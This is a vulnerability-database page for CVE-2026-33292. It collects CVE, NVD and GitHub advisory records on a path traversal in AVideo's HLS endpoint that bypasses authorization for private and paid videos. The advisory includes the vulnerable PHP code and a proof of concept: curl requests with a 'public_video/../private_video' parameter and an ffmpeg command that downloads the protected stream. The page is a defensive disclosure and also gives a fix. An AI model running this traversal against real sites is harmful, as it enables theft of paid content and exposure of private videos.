Vulnerability-Lookup

CVE-2026-33292 (GCVE-0-2026-33292)

Vulnerability from cvelistv5 – Published: 2026-03-22 16:26 – Updated: 2026-03-23 16:04

Title

AVideo has Authorization Bypass via Path Traversal in HLS Endpoint Allows Streaming Private/Paid Videos

Summary

WWBN AVideo is an open source video platform. Prior to version 26.0, the HLS streaming endpoint (`view/hls.php`) is vulnerable to a path traversal attack that allows an unauthenticated attacker to stream any private or paid video on the platform. The `videoDirectory` GET parameter is used in two divergent code paths — one for authorization (which truncates at the first `/` segment) and one for file access (which preserves `..` traversal sequences) — creating a split-oracle condition where authorization is checked against one video while content is served from another. Version 26.0 contains a fix for the issue.

Severity

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

SSVC

Exploitation: poc Automatable: yes Technical Impact: partial

CISA Coordinator (v2.0.3)

CWE

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Assigner

GitHub_M

References

2 references

URL	Tags
https://github.com/WWBN/AVideo/security/advisorie…	x_refsource_CONFIRM
https://github.com/WWBN/AVideo/commit/bc034066281…	x_refsource_MISC

Impacted products

1 product

Vendor	Product	Version
WWBN	AVideo	Affected: < 26.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-33292",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-23T16:03:44.291371Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-23T16:04:06.517Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "AVideo",
          "vendor": "WWBN",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 26.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "WWBN AVideo is an open source video platform. Prior to version 26.0, the HLS streaming endpoint (`view/hls.php`) is vulnerable to a path traversal attack that allows an unauthenticated attacker to stream any private or paid video on the platform. The `videoDirectory` GET parameter is used in two divergent code paths \u2014 one for authorization (which truncates at the first `/` segment) and one for file access (which preserves `..` traversal sequences) \u2014 creating a split-oracle condition where authorization is checked against one video while content is served from another. Version 26.0 contains a fix for the issue."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-22",
              "description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-22T16:26:08.556Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/WWBN/AVideo/security/advisories/GHSA-pw4v-x838-w5pg",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-pw4v-x838-w5pg"
        },
        {
          "name": "https://github.com/WWBN/AVideo/commit/bc034066281085af00e64b0d7b81d8a025a928c4",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/WWBN/AVideo/commit/bc034066281085af00e64b0d7b81d8a025a928c4"
        }
      ],
      "source": {
        "advisory": "GHSA-pw4v-x838-w5pg",
        "discovery": "UNKNOWN"
      },
      "title": "AVideo has Authorization Bypass via Path Traversal in HLS Endpoint Allows Streaming Private/Paid Videos"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-33292",
    "datePublished": "2026-03-22T16:26:08.556Z",
    "dateReserved": "2026-03-18T18:55:47.426Z",
    "dateUpdated": "2026-03-23T16:04:06.517Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-33292",
      "date": "2026-06-30",
      "epss": "0.00688",
      "percentile": "0.48056"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-33292\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-22T17:17:08.753\",\"lastModified\":\"2026-06-17T10:37:15.880\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"WWBN AVideo is an open source video platform. Prior to version 26.0, the HLS streaming endpoint (`view/hls.php`) is vulnerable to a path traversal attack that allows an unauthenticated attacker to stream any private or paid video on the platform. The `videoDirectory` GET parameter is used in two divergent code paths \u2014 one for authorization (which truncates at the first `/` segment) and one for file access (which preserves `..` traversal sequences) \u2014 creating a split-oracle condition where authorization is checked against one video while content is served from another. Version 26.0 contains a fix for the issue.\"},{\"lang\":\"es\",\"value\":\"WWBN AVideo es una plataforma de video de c\u00f3digo abierto. Antes de la versi\u00f3n 26.0, el endpoint de streaming HLS (\u0027view/hls.php\u0027) es vulnerable a un ataque de salto de ruta que permite a un atacante no autenticado transmitir cualquier video privado o de pago en la plataforma. El par\u00e1metro GET \u0027videoDirectory\u0027 se utiliza en dos rutas de c\u00f3digo divergentes \u2014 una para la autorizaci\u00f3n (que trunca en el primer segmento \u0027/\u0027) y otra para el acceso a archivos (que conserva las secuencias de salto \u0027..\u0027) \u2014 creando una condici\u00f3n de \u0027or\u00e1culo dividido\u0027 donde la autorizaci\u00f3n se verifica contra un video mientras que el contenido se sirve desde otro. La versi\u00f3n 26.0 contiene una soluci\u00f3n para el problema.\"}],\"affected\":[{\"source\":\"security-advisories@github.com\",\"affectedData\":[{\"vendor\":\"WWBN\",\"product\":\"AVideo\",\"versions\":[{\"version\":\"\u003c 26.0\",\"status\":\"affected\"}]}]}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}],\"ssvcV203\":[{\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"ssvcData\":{\"timestamp\":\"2026-03-23T16:03:44.291371Z\",\"id\":\"CVE-2026-33292\",\"options\":[{\"exploitation\":\"poc\"},{\"automatable\":\"yes\"},{\"technicalImpact\":\"partial\"}],\"role\":\"CISA Coordinator\",\"version\":\"2.0.3\"}}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-22\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"26.0\",\"matchCriteriaId\":\"B468F0CE-E5E7-4607-BD15-B5763C47493E\"}]}]}],\"references\":[{\"url\":\"https://github.com/WWBN/AVideo/commit/bc034066281085af00e64b0d7b81d8a025a928c4\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/WWBN/AVideo/security/advisories/GHSA-pw4v-x838-w5pg\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"cna\": {\"title\": \"AVideo has Authorization Bypass via Path Traversal in HLS Endpoint Allows Streaming Private/Paid Videos\", \"source\": {\"advisory\": \"GHSA-pw4v-x838-w5pg\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"WWBN\", \"product\": \"AVideo\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 26.0\"}]}], \"references\": [{\"url\": \"https://github.com/WWBN/AVideo/security/advisories/GHSA-pw4v-x838-w5pg\", \"name\": \"https://github.com/WWBN/AVideo/security/advisories/GHSA-pw4v-x838-w5pg\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/WWBN/AVideo/commit/bc034066281085af00e64b0d7b81d8a025a928c4\", \"name\": \"https://github.com/WWBN/AVideo/commit/bc034066281085af00e64b0d7b81d8a025a928c4\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"WWBN AVideo is an open source video platform. Prior to version 26.0, the HLS streaming endpoint (`view/hls.php`) is vulnerable to a path traversal attack that allows an unauthenticated attacker to stream any private or paid video on the platform. The `videoDirectory` GET parameter is used in two divergent code paths \\u2014 one for authorization (which truncates at the first `/` segment) and one for file access (which preserves `..` traversal sequences) \\u2014 creating a split-oracle condition where authorization is checked against one video while content is served from another. Version 26.0 contains a fix for the issue.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-22\", \"description\": \"CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-22T16:26:08.556Z\"}}, \"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-33292\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-23T16:03:44.291371Z\"}}}], \"providerMetadata\": {\"shortName\": \"CISA-ADP\", \"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"dateUpdated\": \"2026-03-23T16:03:54.354Z\"}}]}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-33292\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-22T16:26:08.556Z\", \"dateReserved\": \"2026-03-18T18:55:47.426Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-22T16:26:08.556Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-33292

Vulnerability from fkie_nvd - Published: 2026-03-22 17:17 - Updated: 2026-06-17 10:37

Severity

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/WWBN/AVideo/commit/bc034066281085af00e64b0d7b81d8a025a928c4	Patch
	security-advisories@github.com	https://github.com/WWBN/AVideo/security/advisories/GHSA-pw4v-x838-w5pg	Exploit, Mitigation, Vendor Advisory

Impacted products

	Vendor	Product	Version
	wwbn	avideo	*

JSON

To clipboard

{
  "affected": [
    {
      "affectedData": [
        {
          "product": "AVideo",
          "vendor": "WWBN",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 26.0"
            }
          ]
        }
      ],
      "source": "security-advisories@github.com"
    }
  ],
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "B468F0CE-E5E7-4607-BD15-B5763C47493E",
              "versionEndExcluding": "26.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "WWBN AVideo is an open source video platform. Prior to version 26.0, the HLS streaming endpoint (`view/hls.php`) is vulnerable to a path traversal attack that allows an unauthenticated attacker to stream any private or paid video on the platform. The `videoDirectory` GET parameter is used in two divergent code paths \u2014 one for authorization (which truncates at the first `/` segment) and one for file access (which preserves `..` traversal sequences) \u2014 creating a split-oracle condition where authorization is checked against one video while content is served from another. Version 26.0 contains a fix for the issue."
    },
    {
      "lang": "es",
      "value": "WWBN AVideo es una plataforma de video de c\u00f3digo abierto. Antes de la versi\u00f3n 26.0, el endpoint de streaming HLS (\u0027view/hls.php\u0027) es vulnerable a un ataque de salto de ruta que permite a un atacante no autenticado transmitir cualquier video privado o de pago en la plataforma. El par\u00e1metro GET \u0027videoDirectory\u0027 se utiliza en dos rutas de c\u00f3digo divergentes \u2014 una para la autorizaci\u00f3n (que trunca en el primer segmento \u0027/\u0027) y otra para el acceso a archivos (que conserva las secuencias de salto \u0027..\u0027) \u2014 creando una condici\u00f3n de \u0027or\u00e1culo dividido\u0027 donde la autorizaci\u00f3n se verifica contra un video mientras que el contenido se sirve desde otro. La versi\u00f3n 26.0 contiene una soluci\u00f3n para el problema."
    }
  ],
  "id": "CVE-2026-33292",
  "lastModified": "2026-06-17T10:37:15.880",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ],
    "ssvcV203": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "ssvcData": {
          "id": "CVE-2026-33292",
          "options": [
            {
              "exploitation": "poc"
            },
            {
              "automatable": "yes"
            },
            {
              "technicalImpact": "partial"
            }
          ],
          "role": "CISA Coordinator",
          "timestamp": "2026-03-23T16:03:44.291371Z",
          "version": "2.0.3"
        }
      }
    ]
  },
  "published": "2026-03-22T17:17:08.753",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/WWBN/AVideo/commit/bc034066281085af00e64b0d7b81d8a025a928c4"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Mitigation",
        "Vendor Advisory"
      ],
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-pw4v-x838-w5pg"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-22"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

GHSA-PW4V-X838-W5PG

Vulnerability from github – Published: 2026-03-19 16:43 – Updated: 2026-03-25 18:33

Summary

AVideo has an Authorization Bypass via Path Traversal in HLS Endpoint Allows Streaming Private/Paid Videos

Details

Summary

The HLS streaming endpoint (view/hls.php) is vulnerable to a path traversal attack that allows an unauthenticated attacker to stream any private or paid video on the platform. The videoDirectory GET parameter is used in two divergent code paths — one for authorization (which truncates at the first / segment) and one for file access (which preserves .. traversal sequences) — creating a split-oracle condition where authorization is checked against one video while content is served from another.

Details

The vulnerability is a split-oracle between the authorization lookup and the filesystem path construction. When hls.php receives a request, it processes $_GET['videoDirectory'] through two independent functions that interpret the input differently.

Step 1 — Authorization lookup truncates at first path segment (objects/video.php:1685-1688):

public static function getVideoFromFileName($fileName, $ignoreGroup = false, $ignoreTags = false)
{
    // ...
    $parts = explode("/", $fileName);
    if (!empty($parts[0])) {
        $fileName = $parts[0];  // Only takes first segment
    }
    $fileName = self::getCleanFilenameFromFile($fileName);
    // ...
    $sql = "SELECT id FROM videos WHERE filename = ? LIMIT 1";
    $res = sqlDAL::readSql($sql, "s", [$fileName]);

For input public_video/../private_video, explode("/", ...) yields ["public_video", "..", "private_video"] and only public_video is used for the DB query. The authorization check at hls.php:73 then runs against this public video:

if (isAVideoUserAgent() || ... || User::canWatchVideo($video['id']) || ...) {

Step 2 — File path construction preserves the traversal (objects/video.php:4622-4638):

public static function getPathToFile($videoFilename, $createDir = false)
{
    $videosDir = self::getStoragePath();
    $videoFilename = str_replace($videosDir, '', $videoFilename);
    $paths = Video::getPaths($videoFilename, $createDir);
    if (preg_match('/index(_offline)?.(m3u8|mp4|mp3)$/', $videoFilename)) {
        $paths['path'] = rtrim($paths['path'], DIRECTORY_SEPARATOR);
        $paths['path'] = rtrim($paths['path'], '/');
        $videoFilename = str_replace($paths['relative'], '', $videoFilename);
        $videoFilename = str_replace($paths['filename'], '', $videoFilename);
    }
    $newPath = addLastSlash($paths['path']) . "{$videoFilename}";
    $newPath = str_replace('//', '/', $newPath);
    return $newPath;
}

getPaths extracts the clean filename (e.g., public_video) to build the base path /videos/public_video/. Then str_replace($paths['filename'], '', $videoFilename) replaces only the clean name from the full input, leaving the traversal intact: /../private_video/index.m3u8. The concatenation at line 4634 produces /videos/public_video/../private_video/index.m3u8, which the OS resolves to /videos/private_video/index.m3u8.

No mitigations exist in the path: - fixPath() (objects/functionsFile.php:1116) only normalizes slashes, does not filter .. - No realpath() call anywhere in the chain - No .. filtering on the videoDirectory parameter - The traversal is in a query parameter, not the URL path, so web server path normalization does not apply

PoC

Prerequisites: An AVideo instance with at least one public video (filename: public_video) and one private/paid video (filename: private_video).

Step 1 — Confirm the private video is inaccessible directly:

curl -s "https://target.com/view/hls.php?videoDirectory=private_video" \
  | head -5
# Expected: "HLS.php Can not see video [ID] (private_video) cannot watch (ID)"

Step 2 — Exploit the split-oracle to stream the private video:

curl -s "https://target.com/view/hls.php?videoDirectory=public_video/../private_video" \
  -H "Accept: application/vnd.apple.mpegurl"
# Expected: Valid M3U8 playlist containing private_video's HLS segments

Step 3 — Stream the private video content using the returned playlist:

# The M3U8 response contains segment URLs; use ffmpeg or any HLS player:
ffmpeg -i "https://target.com/view/hls.php?videoDirectory=public_video/../private_video" \
  -c copy stolen_video.mp4

The authorization check passes because it resolves public_video (the public video), while the file system serves private_video's HLS stream.

Impact

Any unauthenticated user can stream any private, unlisted, or paid video on the platform by knowing or guessing its filename directory.
Paid content bypass: Monetized videos protected by pay-per-view or subscription gates can be streamed for free.
Privacy violation: Videos marked as private or restricted to specific user groups are fully accessible.
Content theft at scale: Video filenames follow predictable patterns (e.g., video_YYYYMMDD_XXXXX), enabling enumeration. An attacker only needs one publicly accessible video to pivot to any other video on the instance.
This affects all AVideo instances with at least one public video, which is the default configuration for any content platform.

Recommended Fix

Sanitize the videoDirectory parameter to reject path traversal sequences before any processing occurs. Apply this fix at the top of view/hls.php:

// view/hls.php — after line 16, before line 17
if (empty($_GET['videoDirectory'])) {
    forbiddenPage("No directory set");
}

// ADD: Reject path traversal attempts
$_GET['videoDirectory'] = str_replace('\\', '/', $_GET['videoDirectory']);
if (preg_match('/\.\./', $_GET['videoDirectory'])) {
    forbiddenPage("Invalid directory");
}
// Normalize: strip leading/trailing slashes, collapse multiples
$_GET['videoDirectory'] = trim($_GET['videoDirectory'], '/');
$_GET['videoDirectory'] = preg_replace('#/+#', '/', $_GET['videoDirectory']);

Additionally, add a realpath() check in getPathToFile as defense-in-depth (objects/video.php:4636):

$newPath = str_replace('//', '/', $newPath);
// ADD: Verify resolved path stays within videos directory
$realPath = realpath($newPath);
$realVideosDir = realpath($videosDir);
if ($realPath === false || strpos($realPath, $realVideosDir) !== 0) {
    return false;
}
return $newPath;

Severity

7.5 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "wwbn/avideo"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "25.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33292"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-19T16:43:03Z",
    "nvd_published_at": "2026-03-22T17:17:08Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\nThe HLS streaming endpoint (`view/hls.php`) is vulnerable to a path traversal attack that allows an unauthenticated attacker to stream any private or paid video on the platform. The `videoDirectory` GET parameter is used in two divergent code paths \u2014 one for authorization (which truncates at the first `/` segment) and one for file access (which preserves `..` traversal sequences) \u2014 creating a split-oracle condition where authorization is checked against one video while content is served from another.\n\n## Details\n\nThe vulnerability is a split-oracle between the authorization lookup and the filesystem path construction. When `hls.php` receives a request, it processes `$_GET[\u0027videoDirectory\u0027]` through two independent functions that interpret the input differently.\n\n**Step 1 \u2014 Authorization lookup truncates at first path segment** (`objects/video.php:1685-1688`):\n\n```php\npublic static function getVideoFromFileName($fileName, $ignoreGroup = false, $ignoreTags = false)\n{\n    // ...\n    $parts = explode(\"/\", $fileName);\n    if (!empty($parts[0])) {\n        $fileName = $parts[0];  // Only takes first segment\n    }\n    $fileName = self::getCleanFilenameFromFile($fileName);\n    // ...\n    $sql = \"SELECT id FROM videos WHERE filename = ? LIMIT 1\";\n    $res = sqlDAL::readSql($sql, \"s\", [$fileName]);\n```\n\nFor input `public_video/../private_video`, `explode(\"/\", ...)` yields `[\"public_video\", \"..\", \"private_video\"]` and only `public_video` is used for the DB query. The authorization check at `hls.php:73` then runs against this public video:\n\n```php\nif (isAVideoUserAgent() || ... || User::canWatchVideo($video[\u0027id\u0027]) || ...) {\n```\n\n**Step 2 \u2014 File path construction preserves the traversal** (`objects/video.php:4622-4638`):\n\n```php\npublic static function getPathToFile($videoFilename, $createDir = false)\n{\n    $videosDir = self::getStoragePath();\n    $videoFilename = str_replace($videosDir, \u0027\u0027, $videoFilename);\n    $paths = Video::getPaths($videoFilename, $createDir);\n    if (preg_match(\u0027/index(_offline)?.(m3u8|mp4|mp3)$/\u0027, $videoFilename)) {\n        $paths[\u0027path\u0027] = rtrim($paths[\u0027path\u0027], DIRECTORY_SEPARATOR);\n        $paths[\u0027path\u0027] = rtrim($paths[\u0027path\u0027], \u0027/\u0027);\n        $videoFilename = str_replace($paths[\u0027relative\u0027], \u0027\u0027, $videoFilename);\n        $videoFilename = str_replace($paths[\u0027filename\u0027], \u0027\u0027, $videoFilename);\n    }\n    $newPath = addLastSlash($paths[\u0027path\u0027]) . \"{$videoFilename}\";\n    $newPath = str_replace(\u0027//\u0027, \u0027/\u0027, $newPath);\n    return $newPath;\n}\n```\n\n`getPaths` extracts the clean filename (e.g., `public_video`) to build the base path `/videos/public_video/`. Then `str_replace($paths[\u0027filename\u0027], \u0027\u0027, $videoFilename)` replaces only the clean name from the full input, leaving the traversal intact: `/../private_video/index.m3u8`. The concatenation at line 4634 produces `/videos/public_video/../private_video/index.m3u8`, which the OS resolves to `/videos/private_video/index.m3u8`.\n\n**No mitigations exist in the path:**\n- `fixPath()` (`objects/functionsFile.php:1116`) only normalizes slashes, does not filter `..`\n- No `realpath()` call anywhere in the chain\n- No `..` filtering on the `videoDirectory` parameter\n- The traversal is in a query parameter, not the URL path, so web server path normalization does not apply\n\n## PoC\n\n**Prerequisites:** An AVideo instance with at least one public video (filename: `public_video`) and one private/paid video (filename: `private_video`).\n\n**Step 1 \u2014 Confirm the private video is inaccessible directly:**\n\n```bash\ncurl -s \"https://target.com/view/hls.php?videoDirectory=private_video\" \\\n  | head -5\n# Expected: \"HLS.php Can not see video [ID] (private_video) cannot watch (ID)\"\n```\n\n**Step 2 \u2014 Exploit the split-oracle to stream the private video:**\n\n```bash\ncurl -s \"https://target.com/view/hls.php?videoDirectory=public_video/../private_video\" \\\n  -H \"Accept: application/vnd.apple.mpegurl\"\n# Expected: Valid M3U8 playlist containing private_video\u0027s HLS segments\n```\n\n**Step 3 \u2014 Stream the private video content using the returned playlist:**\n\n```bash\n# The M3U8 response contains segment URLs; use ffmpeg or any HLS player:\nffmpeg -i \"https://target.com/view/hls.php?videoDirectory=public_video/../private_video\" \\\n  -c copy stolen_video.mp4\n```\n\nThe authorization check passes because it resolves `public_video` (the public video), while the file system serves `private_video`\u0027s HLS stream.\n\n## Impact\n\n- **Any unauthenticated user** can stream any private, unlisted, or paid video on the platform by knowing or guessing its filename directory.\n- **Paid content bypass:** Monetized videos protected by pay-per-view or subscription gates can be streamed for free.\n- **Privacy violation:** Videos marked as private or restricted to specific user groups are fully accessible.\n- **Content theft at scale:** Video filenames follow predictable patterns (e.g., `video_YYYYMMDD_XXXXX`), enabling enumeration. An attacker only needs one publicly accessible video to pivot to any other video on the instance.\n- This affects all AVideo instances with at least one public video, which is the default configuration for any content platform.\n\n## Recommended Fix\n\nSanitize the `videoDirectory` parameter to reject path traversal sequences before any processing occurs. Apply this fix at the top of `view/hls.php`:\n\n```php\n// view/hls.php \u2014 after line 16, before line 17\nif (empty($_GET[\u0027videoDirectory\u0027])) {\n    forbiddenPage(\"No directory set\");\n}\n\n// ADD: Reject path traversal attempts\n$_GET[\u0027videoDirectory\u0027] = str_replace(\u0027\\\\\u0027, \u0027/\u0027, $_GET[\u0027videoDirectory\u0027]);\nif (preg_match(\u0027/\\.\\./\u0027, $_GET[\u0027videoDirectory\u0027])) {\n    forbiddenPage(\"Invalid directory\");\n}\n// Normalize: strip leading/trailing slashes, collapse multiples\n$_GET[\u0027videoDirectory\u0027] = trim($_GET[\u0027videoDirectory\u0027], \u0027/\u0027);\n$_GET[\u0027videoDirectory\u0027] = preg_replace(\u0027#/+#\u0027, \u0027/\u0027, $_GET[\u0027videoDirectory\u0027]);\n```\n\nAdditionally, add a `realpath()` check in `getPathToFile` as defense-in-depth (`objects/video.php:4636`):\n\n```php\n$newPath = str_replace(\u0027//\u0027, \u0027/\u0027, $newPath);\n// ADD: Verify resolved path stays within videos directory\n$realPath = realpath($newPath);\n$realVideosDir = realpath($videosDir);\nif ($realPath === false || strpos($realPath, $realVideosDir) !== 0) {\n    return false;\n}\nreturn $newPath;\n```",
  "id": "GHSA-pw4v-x838-w5pg",
  "modified": "2026-03-25T18:33:42Z",
  "published": "2026-03-19T16:43:03Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-pw4v-x838-w5pg"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33292"
    },
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/commit/bc034066281085af00e64b0d7b81d8a025a928c4"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/WWBN/AVideo"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "AVideo has an Authorization Bypass via Path Traversal in HLS Endpoint Allows Streaming Private/Paid Videos"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-33292 (GCVE-0-2026-33292)

FKIE_CVE-2026-33292

GHSA-PW4V-X838-W5PG

Summary

Details

PoC

Impact

Recommended Fix

Tags

Sightings

Nomenclature